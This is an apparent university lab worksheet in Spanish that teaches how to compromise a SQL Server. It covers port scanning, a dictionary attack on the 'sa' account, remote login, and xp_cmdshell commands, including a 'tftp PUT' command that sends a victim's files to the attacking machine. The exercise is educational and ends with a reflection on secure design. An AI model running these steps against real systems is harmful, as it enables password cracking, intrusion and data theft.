Práctica No. 1
SQL
Server (Valor 10 puntos TRABAJO ENTREGABLE)
Ø Objetivos
Ø
Identificar la presencia de un servidor SQL
Server mediante el uso de software de scanner de puertos.
Ø
Efectuar un ataque por diccionario para
encontrar la contraseña de la cuenta “sa”.
Ø
Conectarse y controlar en forma remota el
servidor.
Ø
Instalar un servidor TFTP en la computadora
atacante.
Ø
Ejecutar comandos del sistema operativo desde
SQL Server.
Introducción:
Basado
en pruebas de infiltración reales que hemos efectuado sobre nuestros clientes
desde internet. La metodología también es muy similar a la usada para hackear a
Microsoft cuando le robaron parte del código fuente de Windows XP. En este
incidente, uno de los programadores de bases de datos tenía una contraseña
sencilla en su equipo, que fue explotada por los atacantes como se describe a
continuación.
Ø Material y equipo
necesario
v 1Computadora
con windows
v Conectar
a la red de internet
Ø Metodología
Realizamos.
Fase 1.
En
este ejercicio, se instalará y ejecutará el software Superscan para identificar
el puerto TCP abierto que indica la presencia de un servidor SQL activo en la
red.
Tarea
|
Pasos Detallados
|
1. Instalación de Superscan.
|
a. Ejecute Windows
b. Inserte la memoria USB.
c. Abra el explorador de archivos, y navegue a
la ubicación del software Superscan
\HERRAMIENTAS
SQL
d. Ejecute el programa instalador de
superscan, superscan.exe, aceptando las opciones por default que presenta el
asistente.
|
2. Scanear el servidor remoto
|
a. Indique la dirección IP del servidor que se
desea analizar: 192.168.1.100.
Esta dirección debe ser la misma en los campos IP Start y Stop.
En Scan Type,
seleccione All list ports from 1-5000.
b. Inicie el escaneo del servidor presionando el
botón Start.
c. Compruebe que el scanner identifica
correctamente el puerto 1433 como servicio SQL
|
Fase 2.
En
este ejercicio, se utilizará la herramienta SQLDict, montando un ataque por
diccionario para encontrar la contraseña de acceso de la cuenta administrativa
“sa”.
Tarea
|
Pasos Detallados
|
1. Ejecutar SQLDict.
|
a. Ejecute el programa sqldict.exe desde el USB
b. En el campo Target server IP, introduzca 192.168.1.100
c. En el campo Target Account, asegúrese que se encuentra sa por default.
d. Seleccione Load Password File
e. Navegue a su USB, localice y seleccione el
archivo passwords.txt.
Nota: el archivo Passwords.txt contiene una selección de las palabras mas
frecuentes que son utilizadas como contraseñas de acceso para diversos
servicios. Este archivo pertenece al CD “Openwall Wordlist Collection”,
disponible en http://openwall.net
f.
Seleccione Start. Después de algunos minutos, deberá aparecer la contraseña.
|
Fase 3.
En
este ejercicio, se usara las herramientas administrativas Management Studio
para conectarse a un servidor y, aprovechando la existencia de una cuenta de
login que se instala por default, obtener el control total del servidor de
bases de datos, en forma remota y con privilegios administrativos.
Tarea
|
Pasos Detallados
|
1. Configurar la herramienta Enterprise Manager,
conectarse al servidor y controlarlo en forma remota.
|
a.
Ejecute la herramienta administrativa
Management Studio en el menú Start |
Programs | Microsoft SQL Server 2005 | SQL Server Management Studio Express
b.
En Nombre
de servidor, introduzca 192.168.1.100
c.
En Autenticación,
seleccione Autenticación de SQL Server. Introduzca la cuenta sa, con la contraseña que crackeo en
el ejercicio anterior. Haga click en Conectar.
|
Fase 4.
En
este ejercicio, se instalará un servidor TFTP en la computadora atacante para
permitir la recepción y envío de archivos sin autenticación. Este software es
necesario debido a que el sistema operativo Windows contiene un cliente TFTP,
pero no el componente servidor.
Tarea
|
Pasos Detallados
|
1. Instalar un servidor TFTP
|
a. Inserte la memoria USB.
b. Abra el explorador de Windows, y navegue a la
ubicación del software TFTP Server:
Carpeta HERRAMIENTAS SQL
c. Ejecute el software instalador de TFTP
Server, SolarWinds-TFTP-Server.exe,
aceptando las opciones por default que presenta el asistente. Si le solicita
el CD de instalación de Microsoft Office, presione Cancelar.
d. En la opción File – Configure, seleccione la pestaña Security, activando la
opción “Transmit and Receive files”.
Presione “OK”.
|
Fase 5.
En
este ejercicio, se empleará la herramienta administrativa Query Analizer para conectarse
al servidor remoto y ejecutar comandos del sistema operativo para navegar el
disco duro. Este escenario simula la presencia de un archivo en el servidor que
nos interesa encontrar y transferir hacia la computadora atacante.
Tarea
|
Pasos Detallados
|
1. Conectarse al servidor remoto
|
a.
En SQL Server Management Studio, selecciona Nueva consulta.
|
2. Ejecutar el extended stored procedure
xp_cmdshell para buscar y transferir un archivo hacia el hacker
|
a.
En la ventana de consultas, introduzca y
ejecute el siguiente comando para localizar cualquier archivo de texto que
usaremos como ejemplo.
xp_cmdshell ‘dir
c:\*.txt /s’
b.
Active el servidor TFTP en la computadora
atacante: menú Start | Programs |
SolarWinds 2001 Standard Edition | File Transfer | TFTP Server.
c.
Transfiera el archivo encontrado hacia el
equipo cliente, ejecutando el siguiente stored procedure:
xp_cmdshell ‘tftp –i
192.168.1.# PUT path’
Sustituya
# por el número de estudiante que usted tiene asignado. Sustituya la
palabra path por la ruta completa
del archivo encontrado en el punto “a”. Si la ruta contiene espacios en
blanco, necesita incluirla entre comillas “ ”.
Por ejemplo, si el archivo que desea
transferir es c:\program files\test.txt,
ejecute:
xp_cmdshell ‘tftp
-i 192.168.1.# PUT “c:\program
files\test.txt”’
d.
Verifique que el archive se transfirió hacia
la computadora atacante, revisando el contenido del directorio c:\TFTP-root
(el directorio que se configure por default para enviar y recibir archives
por TFTP).
|
Reflexión
a. Como serán
tus diseños y administración de las bases de datos, apartir de ahora. ¿Tendrás
algunas consideraciones para implementarlas? ¿Cuáles?
____________________________________________________________________________________________________________________________________________________________________________________________________________________________________________
Ø Sugerencias didácticas
v Trabajo Individual
v Consultar
si lo desea en la red de internet
Ø Resultados
- Explicar a detalle y anexe figuras que ilustren los resultados obtenidos (anexar)
Ø Bibliografía utilizada
Ø Conclusiones
Nombre del alumno ____________________________________
________________________________________________________
Firma, fecha y observaciones del profesor ______________________
No hay comentarios:
Publicar un comentario